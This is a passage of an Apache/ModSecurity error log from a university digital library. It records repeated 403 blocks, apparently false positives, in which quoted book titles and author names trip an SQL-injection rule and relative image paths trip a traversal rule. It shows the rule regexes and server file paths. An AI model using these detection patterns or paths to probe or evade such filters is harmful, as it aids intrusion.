[Mon Aug 28 13:48:36.987661 2023] [:error] [pid 44284] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEMBANGUNAN EKONOMI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxDRMCo-f0AAKz8C8EAAAAb"]
[Mon Aug 28 13:52:02.623099 2023] [:error] [pid 44366] [client 47.128.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20221119_10445835.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxEEsCo-f0AAK1OBrYAAAAK"]
[Mon Aug 28 13:56:59.255242 2023] [:error] [pid 44500] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxFO8Co-f0AAK3UHv8AAAAI"]
[Mon Aug 28 13:58:55.243441 2023] [:error] [pid 44488] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAGEMENT AND ADMINISTATION\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxFr8Co-f0AAK3IdEUAAAAP"]
[Mon Aug 28 13:58:59.851232 2023] [:error] [pid 44488] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PERENCANAAN RUMAH TINGGAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxFs8Co-f0AAK3IdEYAAAAP"]
[Mon Aug 28 14:01:17.754889 2023] [:error] [pid 44581] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22RISALAH RAPAT PANITIA AD HOC  1 BADAN PEKERJA MPR \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxGPcCo-f0AAK4lAugAAAAC"]
[Mon Aug 28 14:01:19.487464 2023] [:error] [pid 44587] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MALAHAYATI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxGP8Co-f0AAK4rHiEAAAAA"]
[Mon Aug 28 14:01:21.062116 2023] [:error] [pid 44583] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22IS HE THE RIGHT ONE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxGQcCo-f0AAK4nZGgAAAAW"]
[Mon Aug 28 14:04:07.988530 2023] [:error] [pid 44629] [client 47.128.29.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Drs. Subandi, M.M.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxG58Co-f0AAK5VOtAAAAAE"]
[Mon Aug 28 14:05:49.552831 2023] [:error] [pid 44657] [client 47.128.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KETIKA REINKARNASI MENJADI PILIHAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxHTcCo-f0AAK5xtacAAAAL"]
[Mon Aug 28 14:08:50.559888 2023] [:error] [pid 44716] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22HAKI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxIAsCo-f0AAK6sKcYAAAAW"]
[Mon Aug 28 14:28:34.540598 2023] [:error] [pid 45024] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MOHAMAAD,  ZAMANBADRUZ\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxMosCo-f0AAK-g8e4AAAAM"]
[Mon Aug 28 14:29:29.867370 2023] [:error] [pid 45023] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KAMUS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxM2cCo-f0AAK-fcDEAAAAK"]
[Mon Aug 28 14:38:08.106842 2023] [:error] [pid 45139] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/persons/person.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxO4MCo-f0AALBT9ZIAAAAH"]
[Mon Aug 28 14:41:27.944332 2023] [:error] [pid 45278] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KORUPSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxPp8Co-f0AALDeds8AAAAN"]
[Mon Aug 28 14:41:43.942360 2023] [:error] [pid 45283] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22COTTERRELL, ROGER.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxPt8Co-f0AALDj0SgAAAAQ"]
[Mon Aug 28 14:52:37.834744 2023] [:error] [pid 45463] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22STRATEGIC MANAGEMENT THEORY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxSRcCo-f0AALGXC8MAAAAg"]
[Mon Aug 28 15:02:13.445606 2023] [:error] [pid 45530] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22melihat kebaikan dalam segala hal\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxUhcCo-f0AALHat2sAAAAK"]
[Mon Aug 28 15:02:39.651988 2023] [:error] [pid 45524] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEDOMAN BUDIDAYA LELE DUMBO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxUn8Co-f0AALHU30IAAAAH"]
[Mon Aug 28 15:17:02.050973 2023] [:error] [pid 45908] [client 47.128.20.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22estetika\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxX-sCo-f0AALNUpMMAAAAM"]
[Mon Aug 28 15:43:11.243721 2023] [:error] [pid 46575] [client 114.5.210.137] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/Buku-200-014.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxeH8Co-f0AALXvTuYAAAAG"]
[Mon Aug 28 15:53:32.945968 2023] [:error] [pid 46741] [client 47.128.24.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MASDUDIN, IVAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxgjMCo-f0AALaVrKMAAAAO"]
[Mon Aug 28 16:04:46.007909 2023] [:error] [pid 46858] [client 47.128.29.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+RAMUAN+TRADISIONAL+UNTUK+HIPERTENSI". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+RAMUAN+TRADISIONAL+UNTUK+HIPERTENSI\\x22:  RAMUAN TRADISIONAL UNTUK HIPERTENSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxjLsCo-f0AALcKzosAAAAP"]
[Mon Aug 28 17:06:00.961721 2023] [:error] [pid 48124] [client 47.128.24.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MZ, LABIB\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxxiMCo-f0AALv8DtEAAAAG"]
[Mon Aug 28 17:14:31.016521 2023] [:error] [pid 48097] [client 47.128.18.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SANI, AHMAD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxzh8Co-f0AALvhtYYAAAAJ"]
[Mon Aug 28 17:48:14.852115 2023] [:error] [pid 48962] [client 157.55.39.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NEGORO, ST.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx7bsCo-f0AAL9CslMAAAAK"]
[Mon Aug 28 17:54:23.217789 2023] [:error] [pid 49071] [client 47.128.17.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22STEPHENS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx838Co-f0AAL@vkLQAAAAH"]
[Mon Aug 28 17:56:12.674944 2023] [:error] [pid 49125] [client 47.128.21.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22THE PARADISE JOURNEYS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9TMCo-f0AAL-lyt8AAAAX"]
[Mon Aug 28 18:17:56.689415 2023] [:error] [pid 49452] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Robert Heine-Geldern\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 